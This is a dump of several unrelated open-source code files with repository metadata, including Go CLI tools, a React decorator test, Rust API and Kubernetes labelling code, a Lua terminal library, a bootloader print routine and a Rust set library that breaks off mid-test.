mid_q := q.vertices[len(q.vertices)/2]
Cp := len_avg / (len_avg + mid_p.Sub(mid_q).Length())
// visibility
// TODO
Cv := 1.0
return Ca * Cs * Cp * Cv
}
func (e *Edge) Subdivide(segments int) {
delta := e.vertices[len(e.vertices)-1].Sub(e.vertices[0])
subdelta := delta.Scale(1.0 / float64(segments))
newVertices := make([]Point, segments+1)
newVertices[segments] = e.vertices[len(e.vertices)-1]
for i := 0; i < segments; i++ {
newVertices[i] = e.vertices[0].Add(subdelta.Scale(float64(i)))
}
e.vertices = newVertices
e.forces = make([]Vector, len(e.vertices))
e.velocities = make([]Vector, len(e.vertices))
if len(e.vertices) != len(e.forces) || len(e.vertices) != len(e.velocities) {
fmt.Println("WTF0")
}
}
func (e *Edge) ClearForces() {
for i, _ := range e.forces {
e.forces[i] = Vector{0, 0}
}
}
func (e *Edge) AddSpringForces() {
if len(e.vertices) != len(e.forces) || len(e.vertices) != len(e.velocities) {
fmt.Println("WTF1")
}
for i := 1; i < len(e.vertices)-1; i++ {
// spring forces
delta0 := e.vertices[i-1].Sub(e.vertices[i])
delta1 := e.vertices[i].Sub(e.vertices[i+1])
// TODO: shouldn't this be the difference from the original length?
delta0_len := delta0.Length()
delta1_len := delta1.Length()
delta0_dir := delta0.Scale(1.0 / delta0_len)
delta1_dir := delta1.Scale(1.0 / delta1_len)
Fs0 := delta0_dir.Scale(K * delta0_len)
Fs1 := delta1_dir.Scale(K * delta1_len)
e.forces[i] = e.forces[i].Add(Fs0).Add(Fs1)
}
}
func (e *Edge) AddElectrostaticForces(q Edge) {
if len(e.vertices) != len(e.forces) || len(e.vertices) != len(e.velocities) {
fmt.Println("WTF2")
}
compat := e.compatibility(q)
for i := 1; i < len(e.vertices)-1; i++ {
// electrostatic forces
delta_e := e.vertices[i].Sub(q.vertices[i])
delta_e_len := delta_e.Length()
delta_e_dir := delta_e.Scale(1.0 / delta_e_len)
Fe := delta_e_dir.Scale(1.0 / delta_e_len)
e.forces[i] = e.forces[i].Add(Fe.Scale(compat))
}
}
func (e *Edge) UpdatePositions(dt float64) bool {
if len(e.vertices) != len(e.forces) || len(e.vertices) != len(e.velocities) {
fmt.Println("WTF3")
}
moved := false
for i, _ := range e.vertices {
// assume mass == 1
// Euler integration (blech)
e.velocities[i] = e.velocities[i].Add(e.forces[i].Scale(dt))
delta_p := e.velocities[i].Scale(dt)
e.vertices[i] = e.vertices[i].Add(delta_p)
if delta_p.Length() > EPSILON {
moved = true
}
}
return moved
}
| 24.744186 | 85 | 0.640664 | 3.484375 |
9c01205d252ee1a4634218eb8952a31f3a7fab86 | 3,906 | js | JavaScript | test/utils.spec.js | lake-effect/react-decoration | a7322bd66eaaffb6376e76cf3e864486904c8fed | [
"MIT"
] | 679 | 2016-09-28T18:15:21.000Z | 2022-02-06T21:21:11.000Z | test/utils.spec.js | lake-effect/react-decoration | a7322bd66eaaffb6376e76cf3e864486904c8fed | [
"MIT"
] | 13 | 2016-10-22T02:45:35.000Z | 2020-03-27T12:44:43.000Z | test/utils.spec.js | lake-effect/react-decoration | a7322bd66eaaffb6376e76cf3e864486904c8fed | [
"MIT"
] | 34 | 2016-09-27T21:06:32.000Z | 2021-07-17T02:44:54.000Z | import expect from 'expect';
import React from 'react';
import ReactTestUtils from 'react-dom/test-utils';
import {
validateClass,
validateFunction,
validateClassAndFunction,
} from '../src/utils/validators';
import getEventPreprocessor from '../src/utils/getEventPreprocessor';
import wrapLifecycleMethod from '../src/utils/wrapLifecycleMethod';
describe('utils', () => {
it('should get a decorator for given events', () => {
expect(getEventPreprocessor).toThrow('Invalid method list');
const prevent = getEventPreprocessor('prevent', 'preventDefault');
expect(prevent(() => false)).toExist();
const unknownEventPrepocessor = getEventPreprocessor('unknown', 'foo');
expect(unknownEventPrepocessor(() => false)).toExist();
const invalidEventFunc = getEventPreprocessor('invalidEventFunc', 'foo', undefined, null);
// eslint-disable-next-line
class Input extends React.Component {
@invalidEventFunc
onChange() {
// do nothing
}
render() {
return (
<input
onChange={this.onChange}
/>
);
}
}
const rendered = ReactTestUtils.renderIntoDocument(<Input />);
const input = ReactTestUtils.findRenderedDOMComponentWithTag(rendered, 'input');
expect(() => ReactTestUtils.Simulate.change(input)).toNotThrow();
});
it('should validate class', () => {
expect(() => validateClass(class Foo { })).toNotThrow();
expect(() => validateClass(43)).toThrow();
expect(() => validateClass(undefined)).toThrow();
expect(
() => validateClass(43, 'foo')
).toThrow('@foo decorator can only be applied to class not: number');
});
it('should validate function', () => {
expect(() => validateFunction(() => 43)).toNotThrow();
expect(() => validateFunction(43)).toThrow();
expect(() => validateFunction(undefined)).toThrow();
expect(
() => validateFunction(43, 'foo')
).toThrow('@foo decorator can only be applied to methods not: number');
});
it('should validate class and function', () => {
expect(() => validateClassAndFunction(() => 43)).toNotThrow();
expect(() => validateClassAndFunction(class Foo { })).toNotThrow();
expect(() => validateClassAndFunction(43)).toThrow();
expect(() => validateClassAndFunction(undefined)).toThrow();
expect(
() => validateClassAndFunction(43, 'foo')
).toThrow('@foo decorator can only be applied to class and methods not: number');
});
it('should wrap a lifecycle method', (done) => {
@wrapLifecycleMethod('componentDidUpdate',
function componentDidUpdateWrapper(prevProps, prevState) {
expect(prevProps).toEqual({});
expect(prevState).toEqual({});
expect(this.foo).toEqual('bar');
return 'foo';
}
)
// eslint-disable-next-line
class DivWithoutUserMethod extends React.Component {
constructor(...params) {
super(...params);
expect(this.componentDidUpdate({}, {})).toEqual('foo');
}
foo = 'bar'
render() {
return (
<div />
);
}
}
@wrapLifecycleMethod('componentDidUpdate', (prevProps, prevState, res) => {
expect(prevProps).toEqual({});
expect(prevState).toEqual({});
expect(res).toEqual(true);
return 'foo';
})
// eslint-disable-next-line
class DivWithUserMethod extends React.Component {
constructor(...params) {
super(...params);
expect(this.componentDidUpdate({}, {})).toEqual('foo');
done();
}
componentDidUpdate() {
expect(this.foo).toEqual('bar');
return true;
}
foo = 'bar';
render() {
return (
<div />
);
}
}
ReactTestUtils.renderIntoDocument(<DivWithoutUserMethod />);
ReactTestUtils.renderIntoDocument(<DivWithUserMethod />);
});
});
| 30.515625 | 94 | 0.616743 | 3.125 |
3d052dd80b40866b1a5f2797e995992515d13b8d | 2,149 | go | Go | pkg/cli/v0/loadbalancer/backends.go | MagnusS/infrakit | 350060829e83c2ff3f10f2ce9af3167590e9b59e | [
"Apache-2.0"
] | 1 | 2021-07-01T05:28:49.000Z | 2021-07-01T05:28:49.000Z | pkg/cli/v0/loadbalancer/backends.go | MagnusS/infrakit | 350060829e83c2ff3f10f2ce9af3167590e9b59e | [
"Apache-2.0"
] | null | null | null | pkg/cli/v0/loadbalancer/backends.go | MagnusS/infrakit | 350060829e83c2ff3f10f2ce9af3167590e9b59e | [
"Apache-2.0"
] | null | null | null | package loadbalancer
import (
"fmt"
"io"
"os"
"github.com/docker/infrakit/pkg/cli"
"github.com/docker/infrakit/pkg/spi/instance"
"github.com/spf13/cobra"
)
// Backends returns the describe command
func Backends(name string, services *cli.Services) *cobra.Command {
backends := &cobra.Command{
Use: "backends",
Short: "Loadbalancer backends",
}
ls := &cobra.Command{
Use: "ls",
Short: "List loadbalancer backends",
}
register := &cobra.Command{
Use: "add <instance.ID> ...",
Short: "Register backends []instance.ID",
RunE: func(cmd *cobra.Command, args []string) error {
if len(args) != 1 {
cmd.Usage()
os.Exit(1)
}
l4, err := services.Scope.L4(name)
if err != nil {
return nil
}
cli.MustNotNil(l4, "L4 not found", "name", name)
ids := []instance.ID{}
for _, a := range args {
ids = append(ids, instance.ID(a))
}
res, err := l4.RegisterBackends(ids)
fmt.Println(res)
return err
},
}
deregister := &cobra.Command{
Use: "rm <instance.ID> ...",
Short: "Deregister backends []instance.ID",
RunE: func(cmd *cobra.Command, args []string) error {
if len(args) != 1 {
cmd.Usage()
os.Exit(1)
}
l4, err := services.Scope.L4(name)
if err != nil {
return nil
}
cli.MustNotNil(l4, "L4 not found", "name", name)
ids := []instance.ID{}
for _, a := range args {
ids = append(ids, instance.ID(a))
}
res, err := l4.DeregisterBackends(ids)
fmt.Println(res)
return err
},
}
backends.AddCommand(ls, register, deregister)
ls.Flags().AddFlagSet(services.OutputFlags)
ls.RunE = func(cmd *cobra.Command, args []string) error {
if len(args) != 0 {
cmd.Usage()
os.Exit(1)
}
l4, err := services.Scope.L4(name)
if err != nil {
return nil
}
cli.MustNotNil(l4, "L4 not found", "name", name)
list, err := l4.Backends()
if err != nil {
return err
}
return services.Output(os.Stdout, list,
func(w io.Writer, v interface{}) error {
fmt.Printf("%-20v\n", "INSTANCE ID")
for _, r := range list {
fmt.Printf("%-20v\n", r)
}
return nil
})
}
return backends
}
| 20.084112 | 67 | 0.604467 | 3.109375 |
9edd57faa5df8c4cb4f693a459e2342b93f2e60c | 1,816 | rs | Rust | src/service/places/request.rs | timeanddate/libtad-rs | c4a3bd4c80780196c17358e7a5b4e39182d857a9 | [
"MIT"
] | null | null | null | src/service/places/request.rs | timeanddate/libtad-rs | c4a3bd4c80780196c17358e7a5b4e39182d857a9 | [
"MIT"
] | null | null | null | src/service/places/request.rs | timeanddate/libtad-rs | c4a3bd4c80780196c17358e7a5b4e39182d857a9 | [
"MIT"
] | null | null | null | use serde::Serialize;
#[derive(Default, Serialize)]
/// Places API request.
///
/// Request is validated when supplied to the client.
///
/// Example:
/// ```
/// use libtad_rs::{
/// ServiceClient,
/// service::places::PlacesRequest,
/// };
///
/// let client = ServiceClient::new("access_key".into(), "secret_key".into());
/// let request = PlacesRequest::new()
/// .with_placeid("158")
/// .set_lang("de")
/// .set_geo(false);
///
/// let response = client.get_places(&request);
/// ```
pub struct PlacesRequest {
placeid: Option<Vec<String>>,
query: Option<String>,
qlimit: Option<u8>,
lang: Option<String>,
geo: Option<u8>,
}
impl PlacesRequest {
/// Start building a new request.
pub fn new() -> Self {
Default::default()
}
/// Set the placeid for the request.
pub fn with_placeid(mut self, placeid: impl Into<String>) -> Self {
if let Some(ref mut placeids) = self.placeid {
placeids.push(placeid.into());
} else {
self.placeid.insert(vec![placeid.into()]);
}
self
}
/// Set the query for the request.
pub fn set_query(mut self, query: impl Into<String>) -> Self {
self.query.insert(query.into());
self
}
/// Set the maximum number of query results to be returned.
pub fn set_qlimit(mut self, qlimit: u8) -> Self {
self.qlimit.insert(qlimit);
self
}
/// Set the request language for the request.
pub fn set_lang(mut self, lang: impl Into<String>) -> Self {
self.lang.insert(lang.into());
self
}
/// Toggle whether to return longitude and latitude for the geo object.
pub fn set_geo(mut self, enable: bool) -> Self {
self.geo.insert(enable.into());
self
}
}
| 23.894737 | 78 | 0.585352 | 3.15625 |
7013b4e6a1fb00a3c474d634a4aea75c55a30781 | 1,784 | go | Go | transpose/transpose.go | charlievieth/utils | 57f65151ac366ad3d0d4389a1f56e003ba4d142c | [
"MIT"
] | 2 | 2018-10-24T10:36:28.000Z | 2021-07-18T15:51:15.000Z | transpose/transpose.go | charlievieth/utils | 57f65151ac366ad3d0d4389a1f56e003ba4d142c | [
"MIT"
] | null | null | null | transpose/transpose.go | charlievieth/utils | 57f65151ac366ad3d0d4389a1f56e003ba4d142c | [
"MIT"
] | null | null | null | package main
import (
"encoding/csv"
"encoding/json"
"flag"
"fmt"
"os"
"path/filepath"
"runtime"
"text/tabwriter"
)
var LineCount int
var MaxLength int
func init() {
flag.IntVar(&LineCount, "n", 2, "Number of lines to transpose")
flag.IntVar(&MaxLength, "l", -1, "Max line length, -1 means no max length")
}
func main() {
flag.Parse()
if flag.NArg() == 0 {
Fatal("USAGE: [OPTIONS] FILENAME")
}
if LineCount <= 0 {
Fatal("lines argument '-n' must be greater than 0")
}
f, err := os.Open(flag.Arg(0))
if err != nil {
Fatal(err)
}
defer f.Close()
r := csv.NewReader(f)
var lines [][]string
for i := 0; i < LineCount; i++ {
a, err := r.Read()
if err != nil {
Fatal(err)
}
lines = append(lines, a)
}
w := tabwriter.NewWriter(os.Stdout, 0, 0, 4, ' ', 0)
for j := range lines[0] {
for i := range lines {
// TODO: don't trim the first column
line := lines[i][j]
if n := MaxLength; n > 0 && len(line) > n {
if n > 6 {
line = line[:n-len("...")] + "..."
} else {
line = line[:n]
}
}
if i == 0 {
fmt.Fprintf(w, "%s:", line)
} else {
fmt.Fprintf(w, "\t%s", line)
}
}
fmt.Fprint(w, "\n")
}
if err := w.Flush(); err != nil {
Fatal(err)
}
}
func PrintJSON(v interface{}) {
enc := json.NewEncoder(os.Stdout)
enc.SetIndent("", " ")
if err := enc.Encode(v); err != nil {
Fatal(err)
}
}
func Fatal(err interface{}) {
if err == nil {
return
}
var s string
if _, file, line, ok := runtime.Caller(1); ok && file != "" {
s = fmt.Sprintf("Error (%s:%d)", filepath.Base(file), line)
} else {
s = "Error"
}
switch err.(type) {
case error, string, fmt.Stringer:
fmt.Fprintf(os.Stderr, "%s: %s\n", s, err)
default:
fmt.Fprintf(os.Stderr, "%s: %#v\n", s, err)
}
os.Exit(1)
}
| 18.778947 | 76 | 0.555493 | 3.453125 |
0cfa89782c8d3290c0c6ceba7319a0449a110fed | 2,585 | py | Python | model/embeddings.py | johnnytorres/crisis_conv_crosslingual | a30e762007e08190275bdd83af3c0bbc717fb516 | [
"MIT"
] | null | null | null | model/embeddings.py | johnnytorres/crisis_conv_crosslingual | a30e762007e08190275bdd83af3c0bbc717fb516 | [
"MIT"
] | null | null | null | model/embeddings.py | johnnytorres/crisis_conv_crosslingual | a30e762007e08190275bdd83af3c0bbc717fb516 | [
"MIT"
] | 1 | 2019-12-03T00:29:14.000Z | 2019-12-03T00:29:14.000Z | import os
import logging
import argparse
import numpy as np
import tensorflow as tf
from keras_preprocessing.text import Tokenizer
from tqdm import tqdm
from data import DataLoader
class EmbeddingsBuilder:
def __init__(self, args):
logging.info('initializing...')
self.args = args
self.dataset = DataLoader(self.args)
self.embeddings_path = args.embeddings_path
self.small_embeddings_path = os.path.splitext(self.embeddings_path)[0] + '_small.vec'
logging.info('initializing...[ok]')
def build_embedding(self, vocab_dict):
"""
Load embedding vectors from a .txt file.
Optionally limit the vocabulary to save memory. `vocab` should be a set.
"""
num_words = len(vocab_dict)
num_found = 0
with open(self.small_embeddings_path, 'w') as out_file:
with tf.gfile.GFile(self.embeddings_path) as f:
header =next(f)
num_embeddings, embeddings_dim = header.split(' ')
num_embeddings = int(num_embeddings)
out_file.write(header)
for _, line in tqdm(enumerate(f), 'loading embeddings', total=num_embeddings):
tokens = line.rstrip().split(" ")
word = tokens[0]
if word in vocab_dict:
num_found += 1
out_file.write(line)
tf.logging.info("Found embeddings for {} out of {} words in vocabulary".format(num_found, num_words))
def run(self):
self.dataset.load()
X = self.dataset.X_train_labeled['moment'].values
X = np.append(X, self.dataset.X_train_unlabeled['moment'].values, axis=0)
X = np.append(X, self.dataset.X_test['moment'].values, axis=0)
tokenizer = Tokenizer()
tokenizer.fit_on_texts(X)
self.build_embedding(tokenizer.word_index)
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.DEBUG)
logging.info('initializing task...')
parser = argparse.ArgumentParser()
parser.add_argument('--data-dir', default='data/claff-happydb')
parser.add_argument('--embeddings-path', type=str, default=None)
parser.add_argument('--num-unlabeled', type=int, default=1000)
parser.add_argument('--use-allfeats', action='store_true', default=False)
parser.add_argument('--predict', action='store_true', default=True)
builder = EmbeddingsBuilder(args=parser.parse_args())
builder.run()
logging.info('task finished...[ok]')
| 31.91358 | 109 | 0.635977 | 3.265625 |
75e147ff08d031c15b62d14418d43f760e0e14c9 | 2,456 | rs | Rust | src/main.rs | MerlinDMC/noderole | 7d90012e597502f2623c333f775f3111585b51cc | [
"Apache-2.0",
"MIT"
] | null | null | null | src/main.rs | MerlinDMC/noderole | 7d90012e597502f2623c333f775f3111585b51cc | [
"Apache-2.0",
"MIT"
] | null | null | null | src/main.rs | MerlinDMC/noderole | 7d90012e597502f2623c333f775f3111585b51cc | [
"Apache-2.0",
"MIT"
] | null | null | null | use clap::{crate_name, AppSettings, Parser};
use figment::{
providers::{Format, Yaml},
Figment,
};
use k8s_openapi::api::core::v1::Node;
use k8s_openapi::apimachinery::pkg::apis::meta::v1::ObjectMeta;
use kube::api::{Api, Patch, PatchParams};
use kube::Client;
use serde::Deserialize;
use std::collections::BTreeMap;
#[derive(Parser)]
#[clap(author, version, about, long_about = None)]
#[clap(global_setting(AppSettings::PropagateVersion))]
#[clap(global_setting(AppSettings::UseLongFormatForHelpSubcommand))]
struct Cli {
/// Path to the config file
#[clap(parse(from_os_str))]
#[clap(short, long, default_value = "/etc/noderole.yml")]
config: std::path::PathBuf,
/// Kubernetes Node name
#[clap(short, long)]
#[clap(env = "NODE_NAME")]
nodename: String,
}
#[derive(Deserialize)]
struct Config {
/// Assignable node roles as a list of strings
roles: Option<Vec<String>>,
/// KV pairs of additional node labels to assign
labels: Option<BTreeMap<String, String>>,
}
#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
let args = Cli::parse();
let config: Config = Figment::new().merge(Yaml::file(args.config)).extract()?;
let client = Client::try_default().await?;
let nodes: Api<Node> = Api::all(client.clone());
// try reading the given node and hard fail if not available
nodes.get(args.nodename.as_str()).await?;
// map of labels to assign
let mut node_labels: BTreeMap<String, String> = BTreeMap::new();
// roles defined in the config file will be prefixed accordingly
match config.roles {
Some(roles) => {
for role in roles {
node_labels.insert(
format!("node-role.kubernetes.io/{}", role),
"true".to_string(),
);
}
}
None => {}
}
// additional raw KV labels will be appended as-is
match config.labels {
Some(labels) => node_labels.extend(labels),
None => {}
}
let patch = Node {
metadata: ObjectMeta {
name: Some(args.nodename.clone()),
labels: Some(node_labels),
..ObjectMeta::default()
},
spec: None,
status: None,
};
let params = PatchParams::apply(crate_name!());
let patch = Patch::Apply(&patch);
nodes.patch(args.nodename.as_str(), ¶ms, &patch).await?;
Ok(())
}
| 27.595506 | 82 | 0.607492 | 3.0625 |
e735358ce337c7093b31d7291a1e03c36b966f7d | 2,593 | lua | Lua | rom/dotos/libraries/termio.lua | development-of-things-software/.OS | e7d2b4f6f42c5339080dd76d900dba01f96d3742 | [
"MIT"
] | null | null | null | rom/dotos/libraries/termio.lua | development-of-things-software/.OS | e7d2b4f6f42c5339080dd76d900dba01f96d3742 | [
"MIT"
] | null | null | null | rom/dotos/libraries/termio.lua | development-of-things-software/.OS | e7d2b4f6f42c5339080dd76d900dba01f96d3742 | [
"MIT"
] | null | null | null | -- terminal I/O library --
local lib = {}
local function getHandler()
local term = os.getenv("TERM") or "generic"
return require("termio."..term)
end
-------------- Cursor manipulation ---------------
function lib.setCursor(x, y)
if not getHandler().ttyOut() then
return
end
io.write(string.format("\27[%d;%dH", y, x))
end
function lib.getCursor()
if not (getHandler().ttyIn() and getHandler().ttyOut()) then
return 1, 1
end
io.write("\27[6n")
getHandler().setRaw(true)
local resp = ""
repeat
local c = io.read(1)
resp = resp .. c
until c == "R"
getHandler().setRaw(false)
local y, x = resp:match("\27%[(%d+);(%d+)R")
return tonumber(x), tonumber(y)
end
function lib.getTermSize()
local cx, cy = lib.getCursor()
lib.setCursor(9999, 9999)
local w, h = lib.getCursor()
lib.setCursor(cx, cy)
return w, h
end
function lib.cursorVisible(vis)
getHandler().cursorVisible(vis)
end
----------------- Keyboard input -----------------
local patterns = {}
local substitutions = {
A = "up",
B = "down",
C = "right",
D = "left",
["5"] = "pageUp",
["6"] = "pageDown"
}
-- string.unpack isn't a thing in 1.12.2's CC:T 1.89.2, so use this instead
-- because this is all we need
local function strunpack(str)
local result = 0
for c in str:reverse():gmatch(".") do
result = bit32.lshift(result, 8) + c:byte()
end
return result
end
local function getChar(char)
local byte = strunpack(char)
if byte + 96 > 255 then
return utf8.char(byte)
end
return string.char(96 + byte)
end
function lib.readKey()
getHandler().setRaw(true)
local data = io.stdin:read(1)
local key, flags
flags = {}
if data == "\27" then
local intermediate = io.stdin:read(1)
if intermediate == "[" then
data = ""
repeat
local c = io.stdin:read(1)
data = data .. c
if c:match("[a-zA-Z]") then
key = c
end
until c:match("[a-zA-Z]")
flags = {}
for pat, keys in pairs(patterns) do
if data:match(pat) then
flags = keys
end
end
key = substitutions[key] or "unknown"
else
key = io.stdin:read(1)
flags = {alt = true}
end
elseif data:byte() > 31 and data:byte() < 127 then
key = data
elseif data:byte() == (getHandler().keyBackspace or 127) then
key = "backspace"
elseif data:byte() == (getHandler().keyDelete or 8) then
key = "delete"
else
key = getChar(data)
flags = {ctrl = true}
end
getHandler().setRaw(false)
return key, flags
end
return lib
| 19.643939 | 75 | 0.587736 | 3.40625 |
cb8f593bf81163325b16a935ee03841686b1722a | 880 | asm | Assembly | os/bootloader/32bit_print.asm | stplasim/basic-os | 36d951e2e2adcbae75a6066b464552b61a3d7f2c | [
"MIT"
] | 2 | 2021-03-21T09:32:19.000Z | 2022-01-28T22:22:41.000Z | os/bootloader/32bit_print.asm | stplasim/basic-os | 36d951e2e2adcbae75a6066b464552b61a3d7f2c | [
"MIT"
] | null | null | null | os/bootloader/32bit_print.asm | stplasim/basic-os | 36d951e2e2adcbae75a6066b464552b61a3d7f2c | [
"MIT"
] | null | null | null | ; This print string routine works in 32-bit mode
; Here we don't have BIOS interrupts. We directly manipulating the VGA video memory instead of calling int 0x10
; The VGA memory starts at address 0xb8000 and it has a text mode which is useful to avoid manipulating direct pixels.
[bits 32] ; using 32-bit protected mode
; this is how constants are defined
VIDEO_MEMORY equ 0xb8000
WHITE_ON_BLACK equ 0x0f ; the color byte for each character
print_string_pm:
pusha
mov edx, VIDEO_MEMORY
print_string_pm_loop:
mov al, [ebx] ; [ebx] is the address of our character
mov ah, WHITE_ON_BLACK
cmp al, 0 ; check if end of string
je print_string_pm_done
mov [edx], ax ; store character + attribute in video memory
add ebx, 1 ; next char
add edx, 2 ; next video memory position
jmp print_string_pm_loop
print_string_pm_done:
popa
ret | 27.5 | 118 | 0.738636 | 3.1875 |
7cd0d34e13cde89496f6e7690d20e351df94ef5d | 9,317 | rs | Rust | weave/src/matrix/forest/mod.rs | tclchiam/weave-ce | 03c7b01b50111c48f6d1b471a23638825d0dbf0e | [
"BSD-3-Clause"
] | 2 | 2018-09-02T03:43:46.000Z | 2018-09-05T22:48:50.000Z | weave/src/matrix/forest/mod.rs | tclchiam/bowtie | 03c7b01b50111c48f6d1b471a23638825d0dbf0e | [
"BSD-3-Clause"
] | null | null | null | weave/src/matrix/forest/mod.rs | tclchiam/bowtie | 03c7b01b50111c48f6d1b471a23638825d0dbf0e | [
"BSD-3-Clause"
] | null | null | null | use std::hash::Hash;
use std::iter::FromIterator;
use hashbrown::{HashMap, HashSet};
use itertools::Itertools;
mod union;
mod intersect;
mod subset;
mod product;
/// Forest is an immutable set of sets
#[derive(Debug, Clone, Eq, PartialEq)]
pub enum Forest<T: Hash + Eq> {
Empty,
Unit(Vec<T>),
Many(HashSet<Vec<T>>),
}
impl<T: Hash + Eq + Clone + Ord + Sync + Send> Into<Vec<Vec<T>>> for Forest<T> {
fn into(self) -> Vec<Vec<T>> {
match self {
Forest::Empty => Vec::new(),
Forest::Unit(set) => vec![set],
Forest::Many(matrix) => matrix
.into_iter()
.collect(),
}
}
}
impl<'a, T: Hash + Eq + Clone + Ord + Sync + Send> Into<Vec<Vec<T>>> for &'a Forest<T> {
fn into(self) -> Vec<Vec<T>> {
match self {
Forest::Empty => Vec::new(),
Forest::Unit(set) => vec![set.to_vec()],
Forest::Many(matrix) => matrix
.into_iter()
.cloned()
.collect(),
}
}
}
impl<T: Hash + Eq + Clone + Ord + Sync + Send> Forest<T> {
pub fn empty() -> Self {
Forest::Empty
}
pub fn unit(set: &[T]) -> Self {
Forest::Unit(Self::filter_repeats(set))
}
pub fn many(matrix: &[Vec<T>]) -> Self {
match matrix.len() {
0 => Forest::empty(),
1 => Forest::unit(&matrix[0]),
_ => {
let matrix = matrix.iter()
.cloned()
.map(|set| Self::filter_repeats(&set))
.unique()
.collect();
Forest::Many(matrix)
}
}
}
pub fn unique(set: &[T]) -> Self {
let matrix: Vec<Vec<T>> = set.iter()
.cloned()
.map(|element| vec![element])
.collect();
Forest::many(&matrix)
}
fn filter_repeats<B: FromIterator<T>>(set: &[T]) -> B {
set.iter().cloned().sorted().unique().collect::<B>()
}
pub fn len(&self) -> usize {
match self {
Forest::Empty => 0,
Forest::Unit(_) => 1,
Forest::Many(matrix) => matrix.len(),
}
}
pub fn is_empty(&self) -> bool {
match self {
Forest::Empty => true,
_ => false
}
}
pub fn occurrences(&self) -> Vec<(T, usize)> {
match self {
Forest::Empty => vec![],
Forest::Unit(set) => set.iter()
.map(|item| (item.clone(), 1))
.collect(),
Forest::Many(matrix) => {
matrix.iter()
.flatten()
.fold(HashMap::new(), |mut occurrences, item| {
*occurrences.entry(item.clone()).or_insert(0usize) += 1;
occurrences
})
.into_iter()
.sorted_by(|(item1, _), (item2, _)| Ord::cmp(item1, item2))
.collect()
}
}
}
pub fn intersect(self, other: Self) -> Self {
intersect::intersect(self, other)
}
pub fn union(self, other: Self) -> Self {
union::union(self, other)
}
pub fn product(self, other: Self) -> Self {
product::product(self, other)
}
pub fn subset(self, element: T) -> Self {
subset::subset(self, element)
}
pub fn subset_not(self, element: T) -> Self {
subset::subset_not(self, element)
}
pub fn subset_all(self, elements: &[T]) -> Self {
subset::subset_all(self, elements)
}
pub fn subset_none(self, elements: &[T]) -> Self {
subset::subset_none(self, elements)
}
}
#[cfg(test)]
mod eq_forest_tests {
use super::Forest;
#[test]
fn empty_forest() {
let forest1: Forest<&str> = Forest::empty();
let forest2: Forest<&str> = Forest::empty();
assert_eq!(forest1, forest2);
}
#[test]
fn unit_forest() {
let forest1: Forest<&str> = Forest::unit(&["1", "2"]);
let forest2: Forest<&str> = Forest::unit(&["2", "1"]);
assert_eq!(forest1, forest2);
}
#[test]
fn many_forest() {
let forest1: Forest<&str> = Forest::many(&[vec!["1", "2"]]);
let forest2: Forest<&str> = Forest::many(&[vec!["2", "1"]]);
assert_eq!(forest1, forest2);
}
#[test]
fn many_forest_with_none() {
let forest1 = Forest::<&str>::many(&[]);
let forest2 = Forest::<&str>::empty();
assert_eq!(forest1, forest2);
}
#[test]
fn many_forest_with_one() {
let forest1 = Forest::many(&[vec!["1"]]);
let forest2 = Forest::unit(&["1"]);
assert_eq!(forest1, forest2);
}
}
#[cfg(test)]
mod empty_forest_tests {
use super::Forest;
#[test]
fn empty_forest_has_size_0() {
let forest: Forest<&str> = Forest::empty();
assert_eq!(0, forest.len());
}
#[test]
fn empty_forest_is_empty() {
let forest: Forest<&str> = Forest::empty();
assert_eq!(true, forest.is_empty());
}
#[test]
fn empty_forest_into() {
let forest: Forest<&str> = Forest::empty();
assert_eq!(
Vec::<Vec<&str>>::new(),
Into::<Vec<_>>::into(forest.clone())
);
}
}
#[cfg(test)]
mod unit_forest_tests {
use super::Forest;
#[test]
fn unit_forest_has_size_1() {
let forest: Forest<&str> = Forest::unit(&["1", "2"]);
assert_eq!(1, forest.len());
}
#[test]
fn unit_forest_is_empty() {
let forest: Forest<&str> = Forest::unit(&["1", "2"]);
assert_eq!(false, forest.is_empty());
}
#[test]
fn unit_forest_into() {
let forest: Forest<&str> = Forest::unit(&["1", "2"]);
let expected = vec![vec!["1", "2"]];
assert_eq!(
expected,
Into::<Vec<_>>::into(forest.clone())
);
}
}
#[cfg(test)]
mod many_forest_tests {
use super::Forest;
#[test]
fn many_forest_has_size_2() {
let forest: Forest<&str> = Forest::many(&[
vec!["1", "2"],
vec!["2", "3"]
]);
assert_eq!(2, forest.len());
}
#[test]
fn many_forest_is_not_empty() {
let forest: Forest<&str> = Forest::many(&[
vec!["1", "2"],
vec!["2", "3"]
]);
assert_eq!(false, forest.is_empty());
}
#[test]
fn many_forest_into() {
let forest: Forest<&str> = Forest::many(&[
vec!["1", "2"],
vec!["2", "3"]
]);
let expected = vec![
vec!["1", "2"],
vec!["2", "3"],
];
assert_eq!(
expected,
Into::<Vec<_>>::into(forest.clone())
);
}
#[test]
fn unique_forest_into() {
let forest: Forest<&str> = Forest::unique(&["1", "2"]);
let expected = vec![
vec!["2"],
vec!["1"],
];
assert_eq!(
expected,
Into::<Vec<_>>::into(forest.clone())
);
}
}
#[cfg(test)]
mod random_tests {
use super::Forest;
#[test]
fn product_of_two_forests_of_two() {
let forest = Forest::unique(&["1-1", "1-2", "1-3"])
.product(Forest::unique(&["2-1", "2-2", "2-3"]));
assert_eq!(9, forest.len());
let expected = Forest::many(&[
vec!["1-3", "2-1"],
vec!["1-3", "2-2"],
vec!["2-3", "1-2"],
vec!["1-1", "2-2"],
vec!["1-2", "2-2"],
vec!["2-1", "1-2"],
vec!["1-3", "2-3"],
vec!["1-1", "2-1"],
vec!["1-1", "2-3"],
]);
assert_eq!(
expected,
forest
);
}
#[test]
fn product_of_three_forests_of_three() {
let forest = Forest::unique(&["1-1", "1-2", "1-3"])
.product(Forest::unique(&["2-1", "2-2", "2-3"]))
.product(Forest::unique(&["3-1", "3-2", "3-3"]));
assert_eq!(27, forest.len());
let expected = Forest::many(&[
vec!["1-1", "2-1", "3-1"],
vec!["1-1", "2-1", "3-2"],
vec!["1-1", "2-1", "3-3"],
vec!["1-1", "2-2", "3-1"],
vec!["1-1", "2-2", "3-2"],
vec!["1-1", "2-2", "3-3"],
vec!["1-1", "2-3", "3-1"],
vec!["1-1", "2-3", "3-2"],
vec!["1-1", "2-3", "3-3"],
vec!["1-2", "2-1", "3-1"],
vec!["1-2", "2-1", "3-2"],
vec!["1-2", "2-1", "3-3"],
vec!["1-2", "2-2", "3-1"],
vec!["1-2", "2-2", "3-2"],
vec!["1-2", "2-2", "3-3"],
vec!["1-2", "2-3", "3-1"],
vec!["1-2", "2-3", "3-2"],
vec!["1-2", "2-3", "3-3"],
